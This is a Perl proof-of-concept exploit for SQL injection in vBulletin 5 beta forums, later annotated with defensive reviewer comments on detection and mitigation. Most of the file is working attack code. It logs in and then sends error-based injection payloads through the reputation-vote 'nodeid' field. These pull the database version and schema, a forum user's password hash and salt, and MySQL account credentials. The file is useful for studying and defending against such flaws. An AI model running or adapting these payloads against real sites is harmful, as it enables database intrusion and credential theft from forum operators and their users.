  1. #!/usr/bin/perl
  2. ###################################################################################
  3. #                                                           Saturday, March 30, 2013
  4. #
  5. #
  6. #
  7. #                    _  _  .__                .__              
  8. #                 __| || |_|  |   ____   ____ |__| ____   ____  
  9. #                 \   __   /  | _/ __ \ / ___\|  |/  _ \ /    \
  10. #                  |  ||  ||  |_\  ___// /_/  >  (  <_> )   |  \
  11. #                 /_  ~~  _\____/\___  >___  /|__|\____/|___|  /
  12. #                   |_||_|           \/_____/                \/
  13. #                                    http://www.zempirians.com
  14. #
  15. #          00100011 01101100 01100101 01100111 01101001 01101111 01101110
  16. #
  17. #
  18. #      
  19. #                       [P]roof [o]f [C]oncept, SQL Injection
  20. #     vBulletin™ is the world leader in forum and community publishing software.
  21. #
  22. #
  23. #
  24. ###################################################################################
  25. #                                                           #      T E A M        #
  26. #                                                           #######################
  27. #
  28. # UberLame .......> Provided all proper payloads
  29. # Stealth ........> Thanks ;)
  30. #
  31. ###################################################################################
  32. #  SUMMARY     #
  33. ################
  34. #
  35. # http://target/vb5/index.php/ajax/api/reputation/vote?nodeid=[SQLi]
  36. #
  37. # Database error in vBulletin 5.0.0 Beta 28:
  38. # MySQL Error   : Duplicate entry '#5.1.67#1' for key 'group_key'
  39. # Error Number  : 1062
  40. # Request Date  : Saturday, March 30th 2013 @ 01:13:40 AM
  41. # Error Date    : Saturday, March 30th 2013 @ 01:13:41 AM
  42. # Script        : http:\/\/\/vb5\/index.php\/ajax\/api\/reputation\/vote
  43. #
  44. ################
  45. #  VULNERABLE  #
  46. ################
  47. #
  48. #  vBulletin 5 beta [ALL] - http://vbulletin.com
  49. #
  50. ################
  51. #  CONFIRMED   #
  52. ################
  53. #
  54. #  vBulletin 5 beta 17
  55. #  vBulletin 5 beta 28
  56. #
  57. ################
  58. #  CVE         #
  59. ################
  60. #
  61. #  There is no CVE reported.
  62. #
  63. ################
  64. #  PATCH       #
  65. ################
  66. #
  67. #  There is no PATCH available.
  68. #
  69. ###################################################################################
  70. #                          #                     #
  71. #                          #    H O W - T O      #
  72. #                          #                     #
  73. #                          #######################
  74. #
  75. # Provide the Target: Server, Folder, User, Password, Number and the script will
  76. # login and deliver the payload...
  77. #
  78. # [!USE/]$ ./<file>.pl http://<target>/ <vb5_folder>/ <username> <password> <num>
  79. #
  80. ###################################################################################
  81. use LWP::UserAgent;
  82. use HTTP::Cookies;
  83. use HTTP::Request::Common;
  84. use MIME::Base64;
# --- Reviewer notes (defensive) -------------------------------------------
# Flat script, no subroutines.  What the code below observably does:
#   1. logs in to http://<host><path>auth/login with the supplied credentials;
#   2. sends a fixed sequence of POSTs to
#      http://<host><path>index.php/ajax/api/reputation/vote whose "nodeid"
#      field is the supplied number followed by SQL text;
#   3. searches each response body for a '#...#' marker and prints the text
#      between the markers.
# Detection: a POST to that endpoint whose nodeid is not a plain integer, or a
# response that carries a database error message, is the signature of this
# tool; the User-Agent string used on every request is constant and unusual.
# Mitigation: nodeid must be validated as an integer / bound as a query
# parameter, and database errors must never be echoed to the client -- the
# leak depends on the error text reaching the response body.
# NOTE(review): the header dates this PoC to vBulletin 5 beta builds (2013);
# whether later releases fixed it is not established by this file -- confirm
# against vendor advisories before treating any install as exposed.
# No `use strict`/`use warnings`: $host, $path, $dataA ... are package globals.
system $^O eq 'MSWin32' ? 'cls' : 'clear';   # clear the terminal before the banner
print "
###############################################################################
#'########:'########:'##::::'##::::::::'##::::'########:::'#######:::'######::#
#..... ##:: ##.....:: ###::'###::::::::. ##::: ##.... ##:'##.... ##:'##... ##:#
#:::: ##::: ##::::::: ####'####:'#####::. ##:: ##:::: ##: ##:::: ##: ##:::..::#
#::: ##:::: ######::: ## ### ##:.....::::. ##: ########:: ##:::: ##: ##:::::::#
#:: ##::::: ##...:::: ##. #: ##:'#####::: ##:: ##.....::: ##:::: ##: ##:::::::#
#: ##:::::: ##::::::: ##:.:: ##:.....::: ##::: ##:::::::: ##:::: ##: ##::: ##:#
# ########: ########: ##:::: ##:::::::: ##:::: ##::::::::. #######::. ######::#
#........::........::..:::::..:::::::::..:::::..::::::::::.......::::......:::#
###############################################################################
 
[?] Homepage: http://www.zempirians.com
[?] Binary: 00100011 01101100 01100101 01100111 01101001 01101111 01101110
[?] Effected: vBulletin 5 Beta XX SQLi 0day
[?] Irc Server: irc.zempirians.com +6697
 
";
# Exactly five positional arguments are required; anything else prints usage.
if (@ARGV != 5) {
    print "\r\nUsage: perl file.pl www.target.com/ vb5/ username password magicnum\r\n";
    print "\r\n";
    exit;
}
# Positional arguments.  $host and $path are concatenated directly into URLs,
# so both are expected to end with '/' (see the usage line above).
$host        = $ARGV[0];
$path        = $ARGV[1];
$username    = $ARGV[2];
$password    = $ARGV[3];
$magicnum    = $ARGV[4];
$encpath     = encode_base64('http://'.$host.$path);   # the login form's "url" field carries the forum URL base64-encoded

print "\n";
print "[+] Establishing connection and logging in\n";

my $browser = LWP::UserAgent->new;
my $cookie_jar = HTTP::Cookies->new;

# Log in as the supplied user; the same fixed User-Agent value is reused on
# every request this script makes.
my $response = $browser->post( 'http://'.$host.$path.'auth/login',
    [
        'url' => $encpath,
        'username' => $username,
        'password' => $password,
    ],
    Referer => 'http://'.$host.$path.'auth/login-form?url=http://'.$host.$path.'',
    User-Agent => 'Mozilla/11.01 (Lanows MB 9.1; rv:13.37) Gecko/20200101 Firefox/13.37',
);

$browser->cookie_jar( $cookie_jar );

# Payload 1 (two requests).  Each response body is scanned for the first
# '#...#' span (the regex allows backslash-escaped characters inside it); the
# marker characters are then stripped and the remainder printed.
print "[+] Send payload [ 1 of 4 ]\n";
my $response = $browser->post( 'http://'.$host.$path.'index.php/ajax/api/reputation/vote',
    [
        'nodeid' => $magicnum.') and(select 1 from(select count(*),concat((select (select concat(0x23,cast(version() as char),0x23)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) AND (1338=1338',
    ],
    User-Agent => 'Mozilla/11.01 (Lanows MB 9.1; rv:13.37) Gecko/20200101 Firefox/13.37',
);
$dataA = $response->content;
    if ($dataA =~ /(#((\\.)|[^\\#])*#)/) {
                $fixversion = $1;
                $fixversion =~ s/\#//g;
                # Fixed-offset slice of the response body; presumably the
                # "vBulletin x.y.z Beta NN" text of the error page (23 chars,
                # matching the header's example) -- not verifiable from here.
                $fixvb = substr($dataA, 58, 23);
    };

my $response = $browser->post( 'http://'.$host.$path.'index.php/ajax/api/reputation/vote',
    [
        'nodeid' => $magicnum.') and(select 1 from(select count(*),concat((select (select concat(0x23,cast(schema() as char),0x23)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) AND (1338=1338',
    ],
    User-Agent => 'Mozilla/11.01 (Lanows MB 9.1; rv:13.37) Gecko/20200101 Firefox/13.37',
);
$dataAB = $response->content;
        if ($dataAB =~ /(#((\\.)|[^\\#])*#)/) {
                $fixvbdb = $1;
                $fixvbdb =~ s/\#//g;
        };


print '[+] Recv payload [ SQL Version: '. $fixversion .', running '. $fixvb .', database '. $fixvbdb .' ]';
print "\n";

# Payload 2: same request shape and marker extraction as above.
print "[+] Send payload [ 2 of 4 ]\n";
my $response = $browser->post( 'http://'.$host.$path.'index.php/ajax/api/reputation/vote',
    [
        'nodeid' => $magicnum.') and(select 1 from(select count(*),concat((select (select concat(0x23,cast(user() as char),0x23)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and (1338=1338',
    ],
    User-Agent => 'Mozilla/11.01 (Lanows MB 9.1; rv:13.37) Gecko/20200101 Firefox/13.37',
);
$dataB = $response->content;
    if ($dataB =~ /(#((\\.)|[^\\#])*#)/) {
        $fixuserhost = $1;
        $fixuserhost =~ s/\#//g;
        print '[+] Recv payload [ Forum is running as '. $fixuserhost .' ]';
    };
print "\n";

# Payload 3 (three requests): the database name captured above ($fixvbdb) is
# interpolated into the nodeid text, so these depend on payload 1 succeeding.
print "[+] Send payload [ 3 of 4 ]\n";

my $response = $browser->post( 'http://'.$host.$path.'index.php/ajax/api/reputation/vote',
    [
        'nodeid' => $magicnum.') and(select 1 from(select count(*),concat((select (select concat(0x23,cast((select username from '. $fixvbdb .'.user limit 0,1) as char),0x23)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and (1338=1338',
    ],
    User-Agent => 'Mozilla/11.01 (Lanows MB 9.1; rv:13.37) Gecko/20200101 Firefox/13.37',
);

$dataC = $response->content;
        if ($dataC =~ /(#((\\.)|[^\\#])*#)/) {
                $fixvbuser = $1;
                $fixvbuser =~ s/\#//g;
    };


my $response = $browser->post( 'http://'.$host.$path.'index.php/ajax/api/reputation/vote',
    [
        'nodeid' => $magicnum.') and(select 1 from(select count(*),concat((select (select concat(0x23,cast((select password from '. $fixvbdb .'.user limit 0,1) as char),0x23)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and (1338=1338',
    ],
    User-Agent => 'Mozilla/11.01 (Lanows MB 9.1; rv:13.37) Gecko/20200101 Firefox/13.37',
);

$dataD = $response->content;
        if ($dataD =~ /(#((\\.)|[^\\#])*#)/) {
                $fixvbpass = $1;
                $fixvbpass =~ s/\#//g;
        };


my $response = $browser->post( 'http://'.$host.$path.'index.php/ajax/api/reputation/vote',
    [
        'nodeid' => $magicnum.') and(select 1 from(select count(*),concat((select (select concat(0x23,cast((select salt from '. $fixvbdb .'.user limit 0,1) as char),0x23)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and (1338=1338',
    ],
    User-Agent => 'Mozilla/11.01 (Lanows MB 9.1; rv:13.37) Gecko/20200101 Firefox/13.37',
);

$dataE = $response->content;
        if ($dataE =~ /(#((\\.)|[^\\#])*#)/) {
                $fixvbsalt = $1;
                $fixvbsalt =~ s/\#//g;
        };


print '[+] Recv payload [ VB5 User: '. $fixvbuser . ', Pass: '. $fixvbpass .', Salt: '. $fixvbsalt .' ]';
print "\n";

# Payload 4 (three requests): same request shape, addressing the MySQL
# privilege tables rather than the forum schema.
print "[+] Send payload [ 4 of 4 ]\n";

my $response = $browser->post( 'http://'.$host.$path.'index.php/ajax/api/reputation/vote',
    [
        'nodeid' => $magicnum.') and(select 1 from(select count(*),concat((select (select concat(0x23,cast((select user from mysql.user limit 0,1) as char),0x23)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and (1338=1338',
    ],
    User-Agent => 'Mozilla/11.01 (Lanows MB 9.1; rv:13.37) Gecko/20200101 Firefox/13.37',
);

$dataF = $response->content;
        if ($dataF =~ /(#((\\.)|[^\\#])*#)/) {
                $fixsqluser = $1;
                $fixsqluser =~ s/\#//g;
        };

my $response = $browser->post( 'http://'.$host.$path.'index.php/ajax/api/reputation/vote',
    [
        'nodeid' => $magicnum.') and(select 1 from(select count(*),concat((select (select concat(0x23,cast((select password from mysql.user limit 0,1) as char),0x23)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and (1338=1338',
    ],
    User-Agent => 'Mozilla/11.01 (Lanows MB 9.1; rv:13.37) Gecko/20200101 Firefox/13.37',
);

$dataG = $response->content;
        if ($dataG =~ /(#((\\.)|[^\\#])*#)/) {
                $fixsqlpass = $1;
                $fixsqlpass =~ s/\#//g;
        };

my $response = $browser->post( 'http://'.$host.$path.'index.php/ajax/api/reputation/vote',
    [
        'nodeid' => $magicnum.') and(select 1 from(select count(*),concat((select (select concat(0x23,cast((select host from mysql.user limit 0,1) as char),0x23)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and (1338=1338',
    ],
    User-Agent => 'Mozilla/11.01 (Lanows MB 9.1; rv:13.37) Gecko/20200101 Firefox/13.37',
);

$dataH = $response->content;
        if ($dataH =~ /(#((\\.)|[^\\#])*#)/) {
                $fixsqlhost = $1;
                $fixsqlhost =~ s/\#//g;
        };


print '[+] Recv payload [ SQL User: '. $fixsqluser . ', Pass: '. $fixsqlpass .', Host: ' . $fixsqlhost .' ]';

# Left by the author: dumping the raw response of the second request is the
# quickest way to see what the server actually echoed back.
#print "\n\n[?] Error dump - payload 1\n\n";
#print $dataAB;

print "\n\n";

exit 1;   # NOTE: exits non-zero even on the normal path